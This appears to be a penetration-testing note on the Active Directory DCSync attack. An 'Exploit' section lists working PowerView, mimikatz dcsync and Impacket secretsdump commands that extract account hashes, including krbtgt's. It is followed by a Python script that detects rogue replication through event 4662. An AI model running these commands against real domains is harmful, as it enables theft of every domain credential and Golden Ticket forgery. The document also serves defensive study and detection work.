Overview
In production environments, a domain typically relies on more than one domain controller for redundancy. The Directory Replication Service (DRS) Remote Protocol keeps these domain controllers synchronized through replication: a domain controller can request updates for a specific object, such as an account, through the IDL_DRSGetNCChanges call. Luckily for us, the domain controller that receives such a request does not check whether it came from a known domain controller. It only verifies that the requesting SID holds the required rights, so a rogue update request issued from a user account with those rights succeeds.

To launch a replication request, a user needs the Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups hold these rights. With access to an account in one of these groups, or to any account that has been granted these rights, we can perform a DCSync attack: we impersonate a domain controller and request any account's credentials from the domain. Attackers use this to obtain any account's NTLM hash, including that of the KRBTGT account, which in turn lets them forge Golden Tickets.
Exploit
- Find a user that has the rights listed above (PowerView):
Get-ObjectAcl -DistinguishedName "dc=fcorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
# If the user has the necessary rights (mimikatz):
lsadump::dcsync /domain:<domain> /user:<user>
# For example:
lsadump::dcsync /domain:fcorp.local /user:krbtgt
# With Invoke-Mimikatz (PowerSploit):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
# Linux: from the account found above, using Impacket's secretsdump.py
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
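From the defender's side, the same request shows up on the domain controller as a Directory Service Access event (Windows Security event 4662) whose Properties field carries the replication extended-right GUIDs. The script below is an added example, not part of the original notes: it scans constructed 4662 records and flags replication requests from any principal that is not a known domain controller computer account. The field names follow the 4662 schema; the set of legitimate DC accounts and the sample events are assumptions.

```python
# Added example: flag 4662 events that request replication extended rights
# from an account that is not a known domain controller.
import re

# Extended-right GUIDs the DC checks when servicing IDL_DRSGetNCChanges.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit for "Control Access" (extended rights)
GUID_RE = re.compile(r"\{?([0-9a-f-]{36})\}?", re.I)

def replication_rights_in(properties: str) -> set:
    """Return the replication right names referenced in a 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return {name for guid, name in REPLICATION_RIGHTS.items() if guid in found}

def find_dcsync_candidates(events, dc_accounts):
    """Return (account, rights) for events that look like rogue replication.

    dc_accounts: legitimate DC computer accounts (assumed), e.g. {"DC01$", "DC02$"}.
    DC-to-DC replication is normal and is skipped; any other principal is flagged.
    """
    known_dcs = {a.upper() for a in dc_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
            continue  # not an extended-right access
        rights = replication_rights_in(ev.get("Properties", ""))
        if rights and ev["SubjectUserName"].upper() not in known_dcs:
            hits.append((ev["SubjectUserName"], rights))
    return hits

# Constructed sample events: DC-to-DC replication, a user replicating, a user
# touching an unrelated object (non-replication GUID, no Control Access bit).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for account, rights in find_dcsync_candidates(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"possible DCSync by {account}: {sorted(rights)}")
```

Auditing of the domain naming context must be enabled for 4662 to be logged, and the DC account list should come from the domain's actual domain controllers rather than a hard-coded set.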